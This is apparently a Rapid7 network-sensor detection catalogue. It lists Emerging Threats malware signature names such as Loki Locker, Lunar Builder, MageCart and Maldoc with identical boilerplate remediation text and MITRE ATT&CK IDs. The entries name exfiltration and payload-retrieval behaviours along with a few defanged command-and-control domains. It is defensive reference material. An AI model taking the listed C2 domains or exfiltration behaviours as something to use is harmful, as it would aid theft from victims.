This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Loki Locker Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Loki Locker Ransomware Server Response (Public Key) M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Loki Locker Ransomware Server Response (Public Key) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Loki Locker Ransomware User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LolliCrypt Ransomware Sending Data to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE lolzilla JS/PHP WebSkimmer - Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lop_com or variant Checkin (9kgen_up)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lop.gfr/Swizzor HTTP Update/Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lost Door Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE lu0bot Loader HTTP Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE lu0bot Loader HTTP Request M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE lu0bot Loader HTTP Request M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE lu0bot Loader HTTP Response M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LuckyCat/TROJ_WIMMIE Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lucky Ransomware Reporting Successful File Encryption

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Luder.B User-Agent (Mozilla/4.0 (SPGK)) - GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LumOffice Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lunar Builder CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lunar Builder Exfil Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lunar Builder Exfil Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lunar Builder Exfil via Discord M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lunar Builder Exfil via Discord M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lurk Click fraud Template Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lurk Downloader Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lyceum Backdoor CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lyceum Backdoor CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lyceum Backdoor CnC Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LYCEUM MSIL/DanBot CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lyposit Ransomware Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Lyposit Ransomware Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Mac Flashback Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mac Flashback Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MacOS/UpdateAgent.A CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MacOS/UpdateAgent.A CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mac Trojan HTTP Checkin (accept-language violation)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mac User-Agent Typo INBOUND Likely Hostile

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MageCart CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MageCart CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MageCart Exfil URI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MageCart JS Retrieval

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Magecart/Skimmer - AngryBeaver Exfil Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Magecart/Skimmer - _try_action Exfil Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MAGICHOUND.FETCH CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE MAGICHOUND.FETCH Retrieving Malicious PowerShell

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MAGICHOUND.RETRIEVER CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Magician/M461c14n Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MagikPOS CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE MagikPOS Downloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MagikPOS Downloader Retrieving Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Magniber Ransomware Retrieving Instructions

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Activity Sending Windows User Info (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Activity Sending Windows User Info (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Activity (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Checkin Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Checkin Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Downloading from Dropbox via API

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Exfil (2019-12-12)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc OneDrive Download Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Requesting Payload 2020-04-21

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Retrieving Additional Resources (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Retrieving Binary (Likely Trickbot)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Retrieving Payload 2021-06-15

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Retrieving Payload 2021-07-06

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Retrieving Payload March 30 2017

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Retrieving Payload May 23 2017 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Retrieving Possible Ostap Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Retrieving Remote Template (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Retrieving Remote Template (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Second Stage VBS Downloader with URL Padding

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Sending Windows System Information (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Chrome Extension Requesting Websocket

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Cobalt Strike SSL Cert (asurecloud .tech)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Cobalt Strike SSL Certificate (cloudflace-network .digital)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Dropper Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious JS.Nemucod to PS Dropping PE Nov 14 M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious lnk Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Mega Chrome Extension Exfil Domain (www .megaopac .host in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Second Stage Payload Inbound 2021-02-19

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious SSL Certificate detected (Cobalt Strike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL certificate detected (FindPOS)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL certificate detected (OSX/Keydnap CnC)

Description
Copy link

Recommendation
Copy link

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (Patchwork CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL certificate detected (Possible Sinkhole)

Description
Copy link

Recommendation
Copy link

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious VBE Script (COVID-19 Phish 2020-04-03)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious VBS Downloader fake image zip

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious XLS DDE rar Drop Attempt (.live)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious XLS DDE rar Drop Fake 404 Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

